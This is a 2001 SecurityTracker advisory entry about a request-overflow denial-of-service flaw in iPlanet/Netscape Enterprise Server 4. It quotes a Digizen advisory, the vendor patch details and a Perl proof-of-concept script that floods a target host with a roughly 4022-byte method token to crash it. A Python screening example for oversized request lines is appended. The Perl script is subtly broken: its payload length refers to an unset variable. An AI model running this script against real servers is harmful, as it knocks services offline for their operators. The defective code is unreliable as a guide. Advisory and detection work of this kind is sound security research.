SecurityTracker.com
Category:   Application (Web Server/CGI)  >   Sun ONE/iPlanet Web Server
Vendors:   Netscape, Sun
(Exploit Code for Denial of Service) Re: iPlanet Web Server Allows Remote Users to Execute Arbitrary Code on the Server and to Crash the Server
SecurityTracker Alert ID:  1001584
SecurityTracker URL:  http://securitytracker.com/id/1001584
CVE Reference:   GENERIC-MAP-NOMATCH
Date:  May 20 2001
Impact:   Denial of service via network, Execution of arbitrary code via network, User access via network
Exploit Included:  Yes  
Version(s): v4.1 SP 3-7
Description:   iPlanet announced that there is a vulnerability in the iPlanet Web Server that allows a remote user to crash the web services. The vulnerability also allows a remote user to gain shell access on the server (note that iPlanet did not mention this latter impact in their advisory).

The Source Message contains a demonstration exploit script provided by Digizen Security Group.

Impact:   A remote user can cause the web server application to crash. In the Web Publisher vulnerability, a remote user can obtain shell access on the server.
Solution:   The vendor has released a fix. See the Vendor URL.

The vendor recommends deployment of the following NSAPI:

aix_flexlog2.tgz
dec-osf1_flexlog2.tgz
hpux_flexlog2.tgz
linux_flexlog2.tgz
solaris_flexlog2.tgz
winnt_flexlog2.zip

Vendor URL:  www.iplanet.com/products/iplanet_web_enterprise/iwsalert5.11.html
Cause:   Boundary error, Input validation error
Underlying OS:  Linux (Any), UNIX (AIX), UNIX (HP/UX), UNIX (Solaris - SunOS), Windows (NT), Windows (2000)

Message History:   This archive entry is a follow-up to the message listed below.
May 15 2001 iPlanet Web Server Allows Remote Users to Execute Arbitrary Code on the Server and to Crash the Server



 Source Message Contents

Subject:  Netscape Enterprise Server 4 Method and URI overflow


Digizen Security Group advisory, 2001
Netscape Enterprise Server 4 Method and URI overflow

Systems affected:
Netscape Enterprise Server 4/SP7 (possibly 4/SP3-SP7) running on
Windows NT and Win2k

Risk: Denial of Service
Date: 18 May 2001
Vendor Notified: 25 April 2001

Legal Notice:
This Advisory is Copyright (c) 2001 Digizen Security Group and Roberto
Cardona. You may distribute it unmodified. You may not modify it and
distribute it or distribute parts of it without the author's written
permission.

Disclaimer:
In no event shall the author be liable for any damages whatsoever
arising out of or in connection with the use of this information.
Any use of this information is at the user's own risk.

Description:

By sending an invalid method or URI request of 4022 bytes Netscape
Enterprise Server will stop responding to requests.

Vendor Status:
Netscape was informed and responded on the same business day.

Vendor's Response:

The security & stability of iPlanet's customers' environments is one of
our paramount concerns. To ensure the stability of our customers'
environments iPlanet has made available an NSAPI patch that can be
applied to iPlanet Web Server, Enterprise Edition version 4.1 Service
Packs 3 through 7. The NSAPI patch is available at
http://www.iplanet.com/products/iplanet_web_enterprise/iwsalert5.11.html.
This issue will also be addressed by the release of iPlanet Web Server,
Enterprise Edition version 4.1 Service Pack 8.

--------------------------------------------------------------------------------------
#!/usr/bin/perl
use IO::Socket;
  if (@ARGV < 2)  {
     print "Usage: host port\n";
     exit;
   }
$overflow = "A" x $4022;
&connect;
sleep(15);
&connect;
exit;
################################################
sub connect() {
  $sock= IO::Socket::INET->new(Proto=>"TCP",
			     PeerAddr=>$ARGV[0],
			     PeerPort=>"$ARGV[1]",)
			     or die "Cant connect to $ARGV[0]: $!\n";
  $sock->autoflush(1);
  print $sock "$overflow /index.html HTTP/1.0\n\n";
  $response=<$sock>;
  print "$response";
  while(<$sock>){
     print "$_\n";
  }
  close $sock;
}
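
For defenders, the condition the advisory describes (a method or URI token of about 4022 bytes) can be screened for at a front-end proxy or in captured request lines. The Python below is an added example, not part of the Digizen advisory or the vendor's NSAPI patch; the function names, the method allowlist and the length limits are assumptions chosen for illustration.

```python
# Added example: flag request lines whose method or URI token is abnormally long.
# The limits are assumptions for illustration, not values from the vendor.
KNOWN_METHODS = {b"GET", b"HEAD", b"POST", b"PUT", b"DELETE",
                 b"OPTIONS", b"TRACE", b"CONNECT"}
MAX_METHOD_LEN = 16    # assumed; the longest standard method is 7 bytes
MAX_URI_LEN = 2048     # assumed; tune to the longest legitimate URL in use
ADVISORY_LEN = 4022    # request size reported in the advisory


def classify_request_line(raw: bytes) -> str:
    """Return a verdict for one raw HTTP request line."""
    line = raw.rstrip(b"\r\n")
    parts = line.split(b" ")
    if len(parts) != 3 or not parts[2].startswith(b"HTTP/"):
        # A huge line that does not parse still gets a length verdict.
        return "oversized-malformed" if len(line) > MAX_URI_LEN else "malformed"
    method, uri, _version = parts
    if len(method) > MAX_METHOD_LEN:
        return "oversized-method"
    if len(uri) > MAX_URI_LEN:
        return "oversized-uri"
    if method not in KNOWN_METHODS:
        return "unknown-method"
    return "ok"


def scan(request_lines):
    """Return (index, verdict, method_len, uri_len) for every non-ok line."""
    findings = []
    for i, raw in enumerate(request_lines):
        verdict = classify_request_line(raw)
        if verdict != "ok":
            tokens = raw.rstrip(b"\r\n").split(b" ")
            uri_len = len(tokens[1]) if len(tokens) > 1 else 0
            findings.append((i, verdict, len(tokens[0]), uri_len))
    return findings


# Constructed sample input (not captured traffic).
SAMPLE = [
    b"GET /index.html HTTP/1.0\r\n",
    b"A" * ADVISORY_LEN + b" /index.html HTTP/1.0\n",
    b"GET /" + b"B" * ADVISORY_LEN + b" HTTP/1.0\r\n",
    b"FOO /index.html HTTP/1.0\r\n",
    b"GET /index.html\r\n",
]

if __name__ == "__main__":
    for finding in scan(SAMPLE):
        print(finding)
```

Rejecting or logging the oversized verdicts before the request reaches an unpatched server complements the vendor fix rather than replacing it.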



 
 

